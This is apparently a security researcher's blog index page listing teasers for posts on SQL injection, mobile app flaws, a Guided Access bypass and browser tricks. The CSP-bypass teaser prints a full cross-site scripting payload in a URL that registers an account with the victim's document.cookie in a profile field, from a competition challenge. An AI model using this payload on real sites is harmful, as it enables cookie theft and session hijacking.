Category: Research
-
Weird Web Series: Packing Data onto Your Browser
Welcome back to Post #2 of this Weird Web series. For those who found their way here outside of my LinkedIn, the idea is to explore unconventional (and occasionally rebellious) ways to use the internet. In this ‘episode’ we’re examining how most browsers provide (free) data storage and sync mechanisms – that you can exploit…
-
Weird Web Series: A Dynamic Website on S3?
During covid (as all good stories start) a good friend and I got very into making cocktails together over Facetime. We called it ‘Booze-day Tuesdays‘, later simply Tuesdays. If we ever open a cocktail bar, that’s its name. Though, we quickly realised that tracking our mixology journey wasn’t a job for pen and paper… and…
-
Guided Access Mode Bypass
As a penetration tester who specialises in mobile apps, I get good visibility of how the enterprise is adopting/using/misusing various iOS capabilities and MDM features. One trend I’ve seen increasingly, is the use of ‘Guided Access Mode‘ to lock down devices. Guided-Access Mode (GAM), for the unfamiliar, locks the device into a single app. It’s…
-
Kinda LIKE SQL Injection
TLDR: This post is about some late 90’s level hacking. But the fact is, that there just doesn’t exist a decent explanation of this vulnerability anywhere on the internet.. and yesterday, in 2018, I found another application vulnerable to it (to quite serious effect). I’m afraid that was the straw that broke the camel’s back.…
-
‘App Forgery’
In this (pretty long) post, I’m going to attempt to coin a name for an application vulnerability, most commonly found in mobile apps. This is “App Forgery”.
-
The Happn’ing
Years ago, one of the first posts I ever wrote was about my experience scripting a bot for the dating site OKCupid. It was just a PoC bashed together over a few beers with a friend. Since then (and becoming single) I’ve scripted bits and bobs for virtually every major dating site/app… its become a bit…
-
SQL Injection using System Variables in MySQL
For BSides Manchester 2015, the UK pen-testing company aptly named ‘Pentest Ltd’ held a SQL injection challenge where the injection point required structuring the payload in a specific manner with MySQL voodoo to keep the payload under 90 characters, and bypass a basic WAF. I was fairly certain the lab could also be accomplished using MySQL variables, but…
-
"Bypassing" CSP’s Data-Exfiltration Protections
A long time ago now, I tweeted a challenge to see of anyone knew what the following URL would attempt to do: http://www.insta-mapper.com/google_map.php?device_id=1234′;$.ajax({url:’/wp-login.php?action=register’,type:’POST’,data:”user_login=’dr’&user_email=’dr@evil.com’&gclient_id=&gredirect_uri=http://www.insta-mapper.com/&state_uri=http://www.insta-mapper.com&client_id=721352147882378&redirect_uri=http://www.insta-mapper.com&ws_plugin__s2member_registration=e4e7762e6a&ws_plugin__s2member_custom_reg_field_user_pass1=’123456’&ws_plugin__s2member_custom_reg_field_user_pass2=’123456’&ws_plugin__s2member_custom_reg_field_first_name=’d’&ws_plugin__s2member_custom_reg_field_last_name=’r’&ws_plugin__s2member_custom_reg_field_address_1=’1’&ws_plugin__s2member_custom_reg_field_address_2=&ws_plugin__s2member_custom_reg_field_city=s&ws_plugin__s2member_custom_reg_field_country=u&ws_plugin__s2member_custom_reg_field_mobile_devices='” encodeURI(document.cookie) “‘&ws_plugin__s2member_custom_reg_field_mobile_devices2=Apple&redirect_to=&wp-submit=Register”});var lol=’a Don’t worry, I don’t expect you to stare at that monstrosity. Instead I’ll just tell you; So a friend of mine was competing in WhiteHatRally last year, which is a sort…
-
Hunting bad regex with good regex.
In this post i’ll look at how a simple regex flaw I found on a web application, lead me down a pretty big exploratory hole of trying to search for regex vulnerabilities in applications… using regex; the results of which have since been useful on many of my engagements.
hiburn8 📈🔥🎱 